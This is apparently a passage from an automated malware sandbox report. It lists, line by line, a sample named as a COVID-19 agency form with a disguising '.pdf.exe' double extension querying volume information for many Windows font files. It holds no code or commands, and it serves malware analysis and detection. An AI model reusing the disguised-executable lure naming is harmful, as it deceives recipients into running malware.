Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
